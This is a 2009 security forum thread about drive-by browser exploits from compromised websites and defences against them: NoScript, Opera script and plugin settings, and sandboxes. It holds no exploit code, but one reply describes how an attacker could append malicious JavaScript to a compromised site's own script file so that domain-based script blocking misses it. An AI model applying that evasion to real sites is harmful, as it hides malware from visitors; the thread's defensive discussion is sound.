Exploits

Discussion in 'malware problems & news' started by Habakuck, Sep 12, 2009.

Thread Status:
Not open for further replies.
  1. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    Hi @ all.

    I have some questions about browser exploits and techniques against them.

    Let me set up a scenario:

    A normally trustful website (e.g. disney.com) is infected by the exploit kit ‘unique pack’.
    The compromised WebPage contains an injected script. This will cause the browser to visit the site encoded in the script where an exploit kit will test various exploits against the browser and various other installed applications.

    In this scenario the Flash Player and the Adobe Reader are vulnerable and there is no AntiVirus installed.

    The PC is infected by the downloaded and executed malware.


    My questions:

    a) If i visit the infected Site with FireFox 3.5 + NoSkript and FlashBlock, what do i see looking in the NoSkript menue for allowing skripts?

    a 1) Do i see something like this:
    a 2) Or is the skript implemented in the disney.com domain in a way that NoSkript has no chance to seperate them?

    Cause on very much websites you need to turn on the skrips and if a 2) is the case i can't see any protection offered by NoSkript.


    Question b)

    If i visit the infected site with Iron browser and the --save-plugins switch active will the "sandbox/dropped rights" technique protect me against the code execution?



    Question c)

    What does Opera offers against exploits? I cant see any NoSkript oder Sandbox Feature...


    kind regards

    Habakuck
     
    Last edited: Sep 12, 2009
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    This is a common scenario, where a normally trustful website is compromised by code injection which redirects the user to a site with malware code. With Opera configured properly, the PC is not infected.

    Regarding exploits against the browser

    These malware packs such as Gpack and Mpack contain exploits targeting IE6 mostly, a couple against IE7. None have any against Opera.

    Regarding exploits against Flash, Adobe, etc

    These are triggered by scripts on the redirected site, such as:

    [​IMG]

    You will notice that the browser must have both javascript and plugins enabled for the exploit against the Adobe Reader to work. With either one disabled, the exploits fail.

    Disabling Plugins globally in Opera is easy in the Preferences. The function of the Plugin is to load/run the file automatically in the browser window. Disable the plugin and the file doesn't do anything automatically.

    Also Opera permits controlling how specific file types are downloaded. Configuring PDF, etc to prompt for download prevents the file from loading into the browser automatically, so the exploit fails.

    Controlling scripts per site is easy in Opera. You disable scripts globally and configure per site. If I permit scripts on disney.com:

    disney-1.gif

    disney-2.gif

    These settings will be stored by Opera and invoked each time I visit this site. Now, I will click on a link to the Disney Store which will take me to a different site. Checking the Site Preferences, scripting is not enabled.


    disneystore-1.gif

    disneystore-2.gif

    This demonstrates that scripts configured on the parent site do not carry over to linked sites.

    A realworld malware example: user is redirected to a site with a fake scan to trick into installing a rogue AV product. The code on the redirected site loads several javascript files which set up the images for the fake scan:

    Code:
    script src='fileslist.js'>/script
    script src='progressbar2.js?v=1.1'>/script
    script src='common.js'>/script
    With scripting disabled, I see a blank page upon redirection:

    [​IMG]

    If I enable scripting and reload the page, the fake scan image appears:

    [​IMG]

    Proper configuring of the Browser nullifies most of the web-embedded exploits.

    I am not familiar with configuring the other browsers you mention.

    ----
    rich
     
    Last edited: Sep 12, 2009
  3. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    Thank you very much Rich! That was a top-notch answer! :)

    One thing that i didnt get yet:

    If i enable the skripts for disney.com and there is an injected malicious skript will cause that the malicious skript is working as well as the legitimate skripts on that site. Am i right?

    After that the skript will redirect me to another site where the exploit kit is waiting.
    So i will see a random url* in the adress bar and can think about enabling skripts on that site too. *Is that url always so obviously malicious?
    But if i would do so the exploit can do its dirty job.

    Disabling plugins seems to be very good in preventing exploits but things like foxit reader or flash are necessary for me. Otherwise i couldn't see any videos or have a quick view on pdf files.
    I moved to foxit reader because of recurring exploits for Adobe but i could not find a way arround the damm macromedia flash player.
    And i think there were some exploits against the foxit reader to.. :(

    Therefore i am very interssted in either use Opera, FF+NoSkript or Iron with its sandbox. But i dont know how good the sandbox is. In some hacker competitions the iron browser was the only one wich was not hacked. It was exploited but the sandbox provided further code execution... But what a shame: i didn'd found any competition where opera took part in. :doubt:
     
    Last edited: Sep 12, 2009
  4. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    You are welcome.

    Yes, any script will execute if scripting is enabled.

    Seeing a URL - that depends. If it is a script exploit, it may start running before you see a URL. Otherwise, I suppose a Site Advisor might flag a malicious URL, or an Anti-Virus Product might flag something in the code. Yes, the exploit would do its dirty job if permitted to execute.

    I understand that loading in the browser allows you to start reading before the complete document downloads. If this is important, then you have two other protections from the drive-by download: a firewall that monitors outbound connections, and a security product with execution protection. See a description here:

    http://www.urs2.net/rsj/computing/tests/pdf/

    Yes, many. Foxit tended to patch more quickly than Adobe, however, I noticed a number of victims who were using an unpatched version.

    [​IMG]



    ----
    rich
     
    Last edited: Sep 12, 2009
  5. StevieO

    StevieO Registered Member

    Joined:
    Feb 2, 2006
    Posts:
    1,067
    Always good info and screenies from Rmus. As Rmus uses Opera, i'd like to add, here's what happens when i try to view a PDF with Foxit online with FF

    n1.jpg

    I always get promted.

    Plus you can block referrers if you configure FF by typing in about:config and then type in referrer and then double click to Toggle it to False.

    ffr.jpg

    A better way though which will enable to allow/deny referrers in real time on the fly, is to install the Request Policy extension in FF.

    Request Policy.jpg

    You will also see some other extensions i've installed which i highly recommend too.
     
  6. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    hi, i wil just suggest to sandbox your browser. It,s simple, no hassle, and rock solid. Also you don't need to sacrifice any functionality, no pop ups, no need to make a lot of settings too.
    Geswall, defencewall or sandboxie, any one wil do the job.
     
  7. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Hi aigle,

    Are you advising people not to bother with browser settings -- just let drive-by attacks run such as PDF and then empty the sandbox afterwards?

    ----
    rich
     
  8. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    I run my FF sandboxed here. No problem. But i will switch to Win7 64bit and there is no sandbox prog at all.
    So i came to Iron which uses a tiny sandbox.

    Thank you StevieO! That is exactly what i see here.
    But i see one problem: If i want to see this pdf cause i think it is trustful i will allow NoSkript to open that file. If the pdf file is comprised i am in trouble.

    In conclusion i can not see any protection offered by NoSkript. If i visit disney.com and want to see what the site is about i have to allow the skripts exposing me to exploits.
     
    Last edited: Sep 13, 2009
  9. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    IMO a sandbox is easier to manage, more safe and give atlest same level of security. Also there is no loss of usability/ funcionality.

    Choice is yours. Do you want to click n click to make preferences per site basis? or just install a sandbox configure it and forget.

    BTW I did so for long time( tweaking prefernces on per site basis) until I fed up and now my Opera runs with every default option enabled( except some cookie settings), within GesWall. I don,t get any problems and don,t need to bother for a lot of settings. I love security that is install and forget.

    I some one doesn,t want/ like sandboxing for any reasons, then he/ she always has the option to play with browser settings whether it is Opera, IE, or FF etc etc
     
  10. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    Do you know any sandbox for 64 bit?
     
  11. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Not ATM.

    U reminded me of haute secure. I miss that software.
     
    Last edited: Sep 13, 2009
  12. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Thanks for your explanations!

    ----
    rich
     
  13. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    as you wrote iron is one choice but it,s sandbox doesn't work for the plugins.
     
  14. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    it does with the --save-plugins switch! :ninja: And that is really cool! :thumb:
     
  15. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Hmmm. I never knew that. Can u explain this pls?
     
  16. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    One addon i find handy is JS View. It's not meant to be a security tool in any way, it's a programming/development tool.

    But in the context menu you can view all the Javascript on the page:

    js-view.png

    Then if you click on any of the Javascript or CSS entries, it opens it up in a View Source so you can see the scripting. It does help if you understand Javascript, so you can see what it's doing before enabling it but the average person can normally tell if it's calling script from some .cn domain, the code is obfuscated/packed or calling things like Flash or Pdf by skimming over it.

    Anyhow, it may be helpful to someone.
     
  17. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    7,267
    Location:
    England
  18. wrongway67

    wrongway67 Registered Member

    Joined:
    Apr 5, 2008
    Posts:
    45
  19. developers

    developers Registered Member

    Joined:
    Apr 1, 2009
    Posts:
    62
    You can switch to Full domains view and allow only top level script (i.e, disney.com script), so third party scripts (i.e, malicious scripts) are blocked

    http://noscript.net/features

     
  20. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    It will drop the rights for any plugin. So the plugins are integrated in the sandbox.
    And of course it is --safe-plugins. ;) Was a bit late yesterday...
     
  21. Habakuck

    Habakuck Registered Member

    Joined:
    May 24, 2009
    Posts:
    544
    I think that is the default setting. But my question was: Are the malicious skripts implemented in the top-level-document in a way witch NoSkript can not "see"?
     
  22. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Typically the javascript is inserted in the top level document and it pulls the exploit from a third party domain which noscript can see/block.

    However.. Take Wilders for example, there's nothing stopping me from appending the malicious javascript to a pre-existing js file for instance:

    Code:
    wilderssecurity.com/clientscript/vbulletin_menu.js 
    Then uploading the actual exploit to the attachment or avatar directory so it's fully contained on this domain. If you have js allowed for this domain you will get hit.

    If a site is compromised anything can happen, if your favorite software vendors site/server was compromised their .exe could be tampered with and you download it thinking it's a trusted file.

    Noscript alone isn't fool proof, it's about risk reduction and an additional layer that could very well save your backside.
     
  23. developers

    developers Registered Member

    Joined:
    Apr 1, 2009
    Posts:
    62
    The default setting in the menu is "base 2nd level domains", because is simpler for average user.
     
  24. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Thanks, all of you. :)

    But it,s a bit over my head. Do i have to make a custom short cut for iron?
     
  25. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    That's a cool site, whoever built that must be very talented. :argh:

    Yes, create a regular shortcut. Then right click > properties and you will see the path to iron in quotes. After the last quote, add a space then --switch

    Replace switch with whichever command you want to enable/disable. You can add multiple switches with a space:

    chrome.exe --enable-user-scripts --enable-sync --bookmark-menu
     
Loading...
Thread Status:
Not open for further replies.